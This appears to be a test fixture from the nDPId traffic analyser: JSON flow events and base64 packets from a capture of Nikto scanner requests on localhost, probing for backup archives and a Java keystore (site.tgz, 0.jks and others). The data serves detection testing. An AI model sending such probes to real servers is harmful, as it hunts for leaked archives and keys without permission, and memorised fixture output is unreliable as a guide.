-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1576420277184,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277184,"pkt":"AAAAAAAAAAAAAAAACABFAADAdAhAAEAGyC1\/AAABfwAAAcQGH5BYeUyXBV+uwoAYAED+tAAAAQEICp1m\/OidZvzoR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1576420277185,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277185,"pkt":"AAAAAAAAAAAAAAAACABFAADACsVAAEAGMXF\/AAABfwAAAcQIH5AHdTJUhgOj64AYAED+tAAAAQEICp1m\/OmdZvzpR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1576420277186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277186,"pkt":"AAAAAAAAAAAAAAAACABFAADEtSBAAEAGhxF\/AAABfwAAAcQKH5BCRY2PbjuWH4AYAED+uAAAAQEICp1m\/OqdZvzqR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1576420277187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277187,"pkt":"AAAAAAAAAAAAAAAACABFAADEwZ1AAEAGepR\/AAABfwAAAcQMH5B2JfkLbDSLWoAYAED+uAAAAQEICp1m\/OudZvzrR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1576420277189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277189,"pkt":"AAAAAAAAAAAAAAAACABFAADAxaRAAEAGdpF\/AAABfwAAAcQOH5BgW\/00es\/TMYAYAED+tAAAAQEICp1m\/O2dZvztR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1576420277190,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277190,"pkt":"AAAAAAAAAAAAAAAACABFAADACFhAAEAGM95\/AAABfwAAAcQQH5AQPjDI+venWYAYAED+tAAAAQEICp1m\/O6dZvzuR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1576420277193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277193,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hYJAAEAGtrZ\/AAABfwAAAcQSH5Cznr0TB99xxoAYAED+sQAAAQEICp1m\/PGdZvzwR0VUIC8wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1576420277194,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277194,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JiRAAEAGFhV\/AAABfwAAAcQUH5CXxR6x507sMoAYAED+sQAAAQEICp1m\/PKdZvzyR0VUIC8wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1576420277196,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277196,"pkt":"AAAAAAAAAAAAAAAACABFAADASbJAAEAG8oN\/AAABfwAAAcQWH5DgxXEkcLyXoIAYAED+tAAAAQEICp1m\/PSdZvz0R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1576420277198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277198,"pkt":"AAAAAAAAAAAAAAAACABFAADAjLtAAEAGr3p\/AAABfwAAAcQYH5DOSLQrVcLjaIAYAED+tAAAAQEICp1m\/PadZvz2R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1576420277200,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277200,"pkt":"AAAAAAAAAAAAAAAACABFAADFaNRAAEAG01x\/AAABfwAAAcQaH5BzoVBHI7Wyn4AYAED+uQAAAQEICp1m\/PidZvz4R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 